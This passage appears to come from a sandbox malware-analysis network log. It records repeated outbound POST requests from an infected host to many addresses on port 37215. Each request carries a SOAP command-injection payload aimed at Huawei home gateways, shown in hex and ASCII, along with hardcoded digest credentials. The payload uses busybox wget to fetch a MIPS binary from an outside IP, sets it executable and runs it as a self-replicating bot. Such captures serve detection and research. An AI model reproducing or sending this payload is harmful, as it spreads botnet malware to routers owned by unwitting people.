69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  812192.168.2.1357228157.139.117.13937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.418862104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  813192.168.2.135729241.253.181.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.418879032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  814192.168.2.135184041.45.103.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.418981075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  815192.168.2.134189841.232.124.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.418984890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  816192.168.2.1346590157.114.188.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.419003963 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  817192.168.2.134074641.65.177.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.419195890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  818192.168.2.1338158157.73.19.8837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.419250965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  819192.168.2.1336222105.221.208.7337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.419312954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  820192.168.2.1339638157.138.183.2137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.419348955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  821192.168.2.1338866197.51.106.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.419370890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  822192.168.2.134288041.152.145.24437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.419409037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
